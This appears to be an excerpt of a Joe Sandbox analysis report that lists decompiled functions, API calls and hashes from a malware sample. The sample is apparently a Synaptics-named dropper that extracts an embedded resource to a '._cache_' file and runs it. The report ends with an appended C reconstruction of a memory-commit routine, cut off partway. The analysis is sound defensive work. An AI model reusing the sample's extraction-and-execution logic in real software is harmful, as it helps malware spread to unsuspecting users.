                                                    • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                    • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00477AD8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				intOrPtr _v12;
                                                    				char _v13;
                                                    				char _v14;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				char _v40;
                                                    				char _v56;
                                                    				char _v72;
                                                    				char _v76;
                                                    				char _v80;
                                                    				void* __ecx;
                                                    				struct HINSTANCE__* _t54;
                                                    				void* _t65;
                                                    				void* _t67;
                                                    				intOrPtr _t120;
                                                    				void* _t123;
                                                    				struct HINSTANCE__* _t130;
                                                    				struct HINSTANCE__* _t133;
                                                    				intOrPtr _t141;
                                                    				intOrPtr _t145;
                                                    				intOrPtr _t146;
                                                    				intOrPtr _t153;
                                                    				intOrPtr _t157;
                                                    				intOrPtr _t161;
                                                    				intOrPtr _t162;
                                                    
                                                    				_t159 = __esi;
                                                    				_t158 = __edi;
                                                    				_t161 = _t162;
                                                    				_t120 = 9;
                                                    				do {
                                                    					_push(0);
                                                    					_push(0);
                                                    					_t120 = _t120 - 1;
                                                    				} while (_t120 != 0);
                                                    				_t1 =  &_v8;
                                                    				 *_t1 = _t120;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_v13 =  *_t1;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t161);
                                                    				_push(0x477dae);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t162;
                                                    				_t118 = E00404E80(_v8);
                                                    				_t54 =  *0x49e668; // 0x400000
                                                    				if(FindResourceA(_t54, _t53, 0xa) != 0) {
                                                    					_v14 = 1;
                                                    					E00409F48( &_v28);
                                                    					_push(_v28);
                                                    					_push(0x477dc8);
                                                    					_push("._cache_");
                                                    					E00402B68(0,  &_v36);
                                                    					E00409E18(_v36,  &_v32);
                                                    					_push(_v32);
                                                    					E00404D40();
                                                    					_push(_t161);
                                                    					_push(0x477d03);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t162;
                                                    					_t65 = E00409A48(_v24, __eflags);
                                                    					__eflags = _t65;
                                                    					if(_t65 != 0) {
                                                    						_t67 = E00474C10(_v24, _t118, _v8, __edi, __esi);
                                                    						__eflags = _t67;
                                                    						if(_t67 != 0) {
                                                    							E00409A90(_v24, 0x80);
                                                    							E00409BAC(_v24);
                                                    							E00404BB8( &_v56, _t118);
                                                    							_t130 =  *0x49e668; // 0x400000
                                                    							_v20 = E0041E0D0(_t130, 1, 0xa, _v56);
                                                    							_push(_t161);
                                                    							_push(0x477ca2);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t162;
                                                    							E0041DD9C(_v20, _t118, _v24, _t158);
                                                    							_pop(_t153);
                                                    							 *[fs:eax] = _t153;
                                                    							E00403BEC(_v20);
                                                    						}
                                                    					} else {
                                                    						E00404BB8( &_v40, _t118);
                                                    						_t133 =  *0x49e668; // 0x400000
                                                    						_v20 = E0041E0D0(_t133, 1, 0xa, _v40);
                                                    						_push(_t161);
                                                    						_push(0x477bd6);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t162;
                                                    						E0041DD9C(_v20, _t118, _v24, __edi); // executed
                                                    						_pop(_t157);
                                                    						 *[fs:eax] = _t157;
                                                    						E00403BEC(_v20);
                                                    					}
                                                    					_pop(_t141);
                                                    					_pop(_t123);
                                                    					 *[fs:eax] = _t141;
                                                    					__eflags = 0;
                                                    					_push(_t161);
                                                    					_push(0x477d81);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t162;
                                                    					E00409A90(_v24, 6);
                                                    					E00472EF0( &_v72, _t118, _t123, __eflags);
                                                    					E00404DCC(_v72, 0x477de8);
                                                    					if(__eflags == 0) {
                                                    						E0047475C( &_v80, _t118, _t158, _t159, __eflags);
                                                    						E00473490(_v12, _t118, _v80, _v24, __eflags, 0, 0);
                                                    					} else {
                                                    						E0047475C( &_v76, _t118, _t158, _t159, __eflags);
                                                    						E00473490(_v12, _t118, _v76, _v24, __eflags, 0, _v13); // executed
                                                    					}
                                                    					_pop(_t145);
                                                    					 *[fs:eax] = _t145;
                                                    				} else {
                                                    					_v14 = 0;
                                                    				}
                                                    				_pop(_t146);
                                                    				 *[fs:eax] = _t146;
                                                    				_push(0x477db5);
                                                    				E004049E4( &_v80, 0xf);
                                                    				return E004049C0( &_v8);
                                                    			}

































                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 00477B20
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFindModuleNameResource
                                                    • String ID: ._cache_
                                                    • API String ID: 938654709-4202169512
                                                    • Opcode ID: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction ID: f4b1b61c27c6b3fcd429a4d8c4df21a5758f96423c611e3672b605c149e07d86
                                                    • Opcode Fuzzy Hash: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction Fuzzy Hash: 7D61D430A042099FDB11EFA5D852AEEB7B9EF49704F60847BF504B7291D739AD01CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00478CB0(void* __edx) {
                                                    				intOrPtr _t3;
                                                    				intOrPtr* _t5;
                                                    				intOrPtr* _t6;
                                                    				intOrPtr* _t7;
                                                    				intOrPtr _t14;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t21;
                                                    
                                                    				_push(_t21);
                                                    				_push(0x478d26);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t21;
                                                    				 *0x49ec80 =  *0x49ec80 + 1;
                                                    				if( *0x49ec80 == 0) {
                                                    					 *0x49ec84 = 1;
                                                    					_t3 =  *0x49ec88; // 0x0
                                                    					E00403BEC(_t3);
                                                    					_t5 =  *0x49dc9c; // 0x49e020
                                                    					 *_t5 = 0;
                                                    					_t6 =  *0x49d7a8; // 0x49e000
                                                    					 *_t6 = 0;
                                                    					_t7 =  *0x49dc20; // 0x49e810
                                                    					 *_t7 = 0;
                                                    					if( *0x49ec90 != 0) {
                                                    						L00417DFC(); // executed
                                                    					}
                                                    					_t18 =  *0x401094; // 0x401098
                                                    					E004054C8(0x49c9e8, 5, _t18);
                                                    				}
                                                    				_pop(_t14);
                                                    				 *[fs:eax] = _t14;
                                                    				_push(0x478d2d);
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • 742FF460.OLE32(00000000,00478D26), ref: 00478CFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F460
                                                    • String ID: I
                                                    • API String ID: 329004136-429267355
                                                    • Opcode ID: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction ID: 9009332550508c6597b3b9da99e6bfd18627bf9d89c0e286b3a7dbd72528ea00
                                                    • Opcode Fuzzy Hash: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction Fuzzy Hash: 43F0A4706046408FF315DF2AED156567BE5EBA9304B828477E408976B1DE785802CB1C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00446564(void* __ecx, void* __edi, void* __esi) {
                                                    				intOrPtr _t6;
                                                    				intOrPtr _t8;
                                                    				intOrPtr _t10;
                                                    				intOrPtr _t12;
                                                    				intOrPtr _t14;
                                                    				void* _t16;
                                                    				void* _t17;
                                                    				intOrPtr _t20;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t28;
                                                    
                                                    				_t25 = __esi;
                                                    				_t17 = __ecx;
                                                    				_push(_t28);
                                                    				_push(0x4465ea);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t28;
                                                    				 *0x49eb20 =  *0x49eb20 - 1;
                                                    				if( *0x49eb20 < 0) {
                                                    					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                    					_t31 =  *0x49eb1c;
                                                    					E00446330(_t16, __edi,  *0x49eb1c);
                                                    					_t6 =  *0x436dd0; // 0x436e1c
                                                    					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
                                                    					_t8 =  *0x436dd0; // 0x436e1c
                                                    					E0041A548(_t8, _t16, _t17, _t31);
                                                    					_t21 =  *0x436dd0; // 0x436e1c
                                                    					_t10 =  *0x447948; // 0x447994
                                                    					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
                                                    					_t22 =  *0x436dd0; // 0x436e1c
                                                    					_t12 =  *0x4465f4; // 0x446640
                                                    					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
                                                    					_t23 =  *0x436dd0; // 0x436e1c
                                                    					_t14 =  *0x44675c; // 0x4467a8
                                                    					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
                                                    				}
                                                    				_pop(_t20);
                                                    				 *[fs:eax] = _t20;
                                                    				_push(0x4465f1);
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                      • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                      • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                      • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                      • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                    • String ID: @fD
                                                    • API String ID: 3775504709-3452771706
                                                    • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                    • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0040484C() {
                                                    				struct HINSTANCE__* _t24;
                                                    				void* _t32;
                                                    				intOrPtr _t35;
                                                    				void* _t45;
                                                    
                                                    				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                    					L3:
                                                    					if( *0x49b004 != 0) {
                                                    						E00404734();
                                                    						E004047C0(_t32);
                                                    						 *0x49b004 = 0;
                                                    					}
                                                    					L5:
                                                    					while(1) {
                                                    						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                    							 *0x0049E644 = 0;
                                                    						}
                                                    						E004045C4(); // executed
                                                    						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                    							_t14 =  *0x0049E648;
                                                    							if( *0x0049E648 != 0) {
                                                    								E0040653C(_t14);
                                                    								_t35 =  *((intOrPtr*)(0x49e648));
                                                    								_t7 = _t35 + 0x10; // 0x400000
                                                    								_t24 =  *_t7;
                                                    								_t8 = _t35 + 4; // 0x400000
                                                    								if(_t24 !=  *_t8 && _t24 != 0) {
                                                    									FreeLibrary(_t24);
                                                    								}
                                                    							}
                                                    						}
                                                    						E0040459C();
                                                    						if( *((char*)(0x49e660)) == 1) {
                                                    							 *0x0049E65C();
                                                    						}
                                                    						if( *((char*)(0x49e660)) != 0) {
                                                    							E00404790();
                                                    						}
                                                    						if( *0x49e638 == 0) {
                                                    							if( *0x49e028 != 0) {
                                                    								 *0x49e028();
                                                    							}
                                                    							ExitProcess( *0x49b000); // executed
                                                    						}
                                                    						memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                    						_t45 = _t45 + 0xc;
                                                    						0x49b000 = 0x49b000;
                                                    					}
                                                    				} else {
                                                    					do {
                                                    						 *0x49e048 = 0;
                                                    						 *((intOrPtr*)( *0x49e048))();
                                                    					} while ( *0x49e048 != 0);
                                                    					goto L3;
                                                    				}
                                                    			}

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                    • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00404844() {
                                                    				intOrPtr* _t13;
                                                    				struct HINSTANCE__* _t27;
                                                    				void* _t36;
                                                    				intOrPtr _t39;
                                                    				void* _t52;
                                                    
                                                    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                                    				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                    					L5:
                                                    					if( *0x49b004 != 0) {
                                                    						E00404734();
                                                    						E004047C0(_t36);
                                                    						 *0x49b004 = 0;
                                                    					}
                                                    					L7:
                                                    					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                    						 *0x0049E644 = 0;
                                                    					}
                                                    					E004045C4(); // executed
                                                    					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                    						_t17 =  *0x0049E648;
                                                    						if( *0x0049E648 != 0) {
                                                    							E0040653C(_t17);
                                                    							_t39 =  *((intOrPtr*)(0x49e648));
                                                    							_t7 = _t39 + 0x10; // 0x400000
                                                    							_t27 =  *_t7;
                                                    							_t8 = _t39 + 4; // 0x400000
                                                    							if(_t27 !=  *_t8 && _t27 != 0) {
                                                    								FreeLibrary(_t27);
                                                    							}
                                                    						}
                                                    					}
                                                    					E0040459C();
                                                    					if( *((char*)(0x49e660)) == 1) {
                                                    						 *0x0049E65C();
                                                    					}
                                                    					if( *((char*)(0x49e660)) != 0) {
                                                    						E00404790();
                                                    					}
                                                    					if( *0x49e638 == 0) {
                                                    						if( *0x49e028 != 0) {
                                                    							 *0x49e028();
                                                    						}
                                                    						ExitProcess( *0x49b000); // executed
                                                    					}
                                                    					memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                    					_t52 = _t52 + 0xc;
                                                    					0x49b000 = 0x49b000;
                                                    					goto L7;
                                                    				} else {
                                                    					do {
                                                    						 *0x49e048 = 0;
                                                    						 *((intOrPtr*)( *0x49e048))();
                                                    					} while ( *0x49e048 != 0);
                                                    					goto L5;
                                                    				}
			}

Line addresses (side column of the listing above, one entry per statement line): 0x00404846 0x00404863 0x0040487b 0x00404882 0x00404884 0x00404889 0x00404890 0x00404890 0x00404895 0x00404899 0x004048a2 0x004048a2 0x004048a5 0x004048ae 0x004048b5 0x004048ba 0x004048bc 0x004048c1 0x004048c4 0x004048c4 0x004048c7 0x004048ca 0x004048d1 0x004048d1 0x004048ca 0x004048ba 0x004048d6 0x004048df 0x004048e1 0x004048e1 0x004048e8 0x004048ea 0x004048ea 0x004048f2 0x004048fb 0x004048fd 0x004048fd 0x00404906 0x00404906 0x00404917 0x00404917 0x00404919 0x00000000 0x0040486a 0x0040486a 0x00404870 0x00404874 0x00404876 0x00000000 0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                    • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00404848() {
                                                    				struct HINSTANCE__* _t26;
                                                    				void* _t35;
                                                    				intOrPtr _t38;
                                                    				void* _t51;
                                                    
                                                    				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
                                                    					L4:
                                                    					if( *0x49b004 != 0) {
                                                    						E00404734();
                                                    						E004047C0(_t35);
                                                    						 *0x49b004 = 0;
                                                    					}
                                                    					L6:
                                                    					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
                                                    						 *0x0049E644 = 0;
                                                    					}
                                                    					E004045C4(); // executed
                                                    					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
                                                    						_t16 =  *0x0049E648;
                                                    						if( *0x0049E648 != 0) {
                                                    							E0040653C(_t16);
                                                    							_t38 =  *((intOrPtr*)(0x49e648));
                                                    							_t7 = _t38 + 0x10; // 0x400000
                                                    							_t26 =  *_t7;
                                                    							_t8 = _t38 + 4; // 0x400000
                                                    							if(_t26 !=  *_t8 && _t26 != 0) {
                                                    								FreeLibrary(_t26);
                                                    							}
                                                    						}
                                                    					}
                                                    					E0040459C();
                                                    					if( *((char*)(0x49e660)) == 1) {
                                                    						 *0x0049E65C();
                                                    					}
                                                    					if( *((char*)(0x49e660)) != 0) {
                                                    						E00404790();
                                                    					}
                                                    					if( *0x49e638 == 0) {
                                                    						if( *0x49e028 != 0) {
                                                    							 *0x49e028();
                                                    						}
                                                    						ExitProcess( *0x49b000); // executed
                                                    					}
                                                    					memcpy(0x49e638,  *0x49e638, 0xb << 2);
                                                    					_t51 = _t51 + 0xc;
                                                    					0x49b000 = 0x49b000;
                                                    					goto L6;
                                                    				} else {
                                                    					do {
                                                    						 *0x49e048 = 0;
                                                    						 *((intOrPtr*)( *0x49e048))();
                                                    					} while ( *0x49e048 != 0);
                                                    					goto L4;
                                                    				}
			}

Line addresses (side column of the listing above, one entry per statement line): 0x00404863 0x0040487b 0x00404882 0x00404884 0x00404889 0x00404890 0x00404890 0x00404895 0x00404899 0x004048a2 0x004048a2 0x004048a5 0x004048ae 0x004048b5 0x004048ba 0x004048bc 0x004048c1 0x004048c4 0x004048c4 0x004048c7 0x004048ca 0x004048d1 0x004048d1 0x004048ca 0x004048ba 0x004048d6 0x004048df 0x004048e1 0x004048e1 0x004048e8 0x004048ea 0x004048ea 0x004048f2 0x004048fb 0x004048fd 0x004048fd 0x00404906 0x00404906 0x00404917 0x00404917 0x00404919 0x00000000 0x0040486a 0x0040486a 0x00404870 0x00404874 0x00404876 0x00000000 0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                    • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                    				signed int _v20;
                                                    				void** _v24;
                                                    				void* _t15;
                                                    				void** _t16;
                                                    				void* _t17;
                                                    				signed int _t27;
                                                    				intOrPtr* _t29;
                                                    				void* _t31;
                                                    				intOrPtr* _t32;
                                                    
                                                    				_v24 = __ecx;
                                                    				 *_t32 = __edx;
                                                    				_t31 = __eax & 0xfffff000;
                                                    				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                    				 *_v24 = _t31;
                                                    				_t15 = _v20 - _t31;
                                                    				_v24[1] = _t15;
                                                    				_t29 =  *0x49e5ec; // 0x49e5ec
                                                    				while(_t29 != 0x49e5ec) {
                                                    					_t7 = _t29 + 8; // 0x0
                                                    					_t17 =  *_t7;
                                                    					_t8 = _t29 + 0xc; // 0x0
                                                    					_t27 =  *_t8 + _t17;
                                                    					if(_t31 > _t17) {
                                                    						_t17 = _t31;
                                                    					}
                                                    					if(_t27 > _v20) {
                                                    						_t27 = _v20;
                                                    					}
                                                    					if(_t27 > _t17) {
                                                    						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                    						if(_t15 == 0) {
                                                    							_t16 = _v24;
                                                    							 *_t16 = 0;
                                                    							return _t16;
                                                    						}
                                                    					}
                                                    					_t29 =  *_t29;
                                                    				}
                                                    				return _t15;
			}

Line addresses (side column of the listing above, one entry per statement line): 0x0040174f 0x00401753 0x0040175a 0x0040176f 0x00401777 0x0040177d 0x00401783 0x00401786 0x004017ca 0x0040178e 0x0040178e 0x00401791 0x00401794 0x00401798 0x0040179a 0x0040179a 0x004017a0 0x004017a2 0x004017a2 0x004017a8 0x004017b5 0x004017bc 0x004017be 0x004017c4 0x00000000 0x004017c4 0x004017bc 0x004017c8 0x004017c8 0x004017d9

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: I
                                                    • API String ID: 4275171209-1966777607
                                                    • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                    • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
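Added example, not the sample's code and not part of the Joe Sandbox report: a readable C re-implementation of the range-commit routine decompiled above as E00401748, so the range arithmetic can be checked more easily than in the decompiler output. What is taken from the listing: the requested range is rounded down and up to 0x1000-byte pages; the routine walks a circular list headed at 0x49e5ec whose nodes hold the next pointer at +0, a base at +8 and a size at +0xc; the overlap of each region with the requested range is committed with VirtualAlloc(addr, len, 0x1000, 4), i.e. MEM_COMMIT with PAGE_READWRITE; and on the first failed commit the caller's base slot is zeroed and the walk stops. The region struct, the commit callback, the recorder and the two sample regions are constructed for this example so that it runs without Windows.

```c
/* Added example: readable reconstruction of the E00401748 range-commit logic.
 * Not the sample's code. Node layout (next +0, base +8, size +0xc) and the
 * sentinel-headed circular list are assumptions read off the decompiled offsets;
 * VirtualAlloc(MEM_COMMIT, PAGE_READWRITE) is replaced by a callback. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SIZE 0x1000u

/* Region node as inferred from the field offsets in the listing. */
typedef struct region {
    struct region *next;   /* +0x0: next node; the list head is a sentinel */
    uint32_t reserved;     /* +0x4: not used by this routine */
    uint32_t base;         /* +0x8: start of a reserved region */
    uint32_t size;         /* +0xc: size of that region */
} region_t;

/* What the decompiled routine writes through __ecx: base at [0], size at [1]. */
typedef struct {
    uint32_t base;   /* page-aligned start; zeroed when a commit fails */
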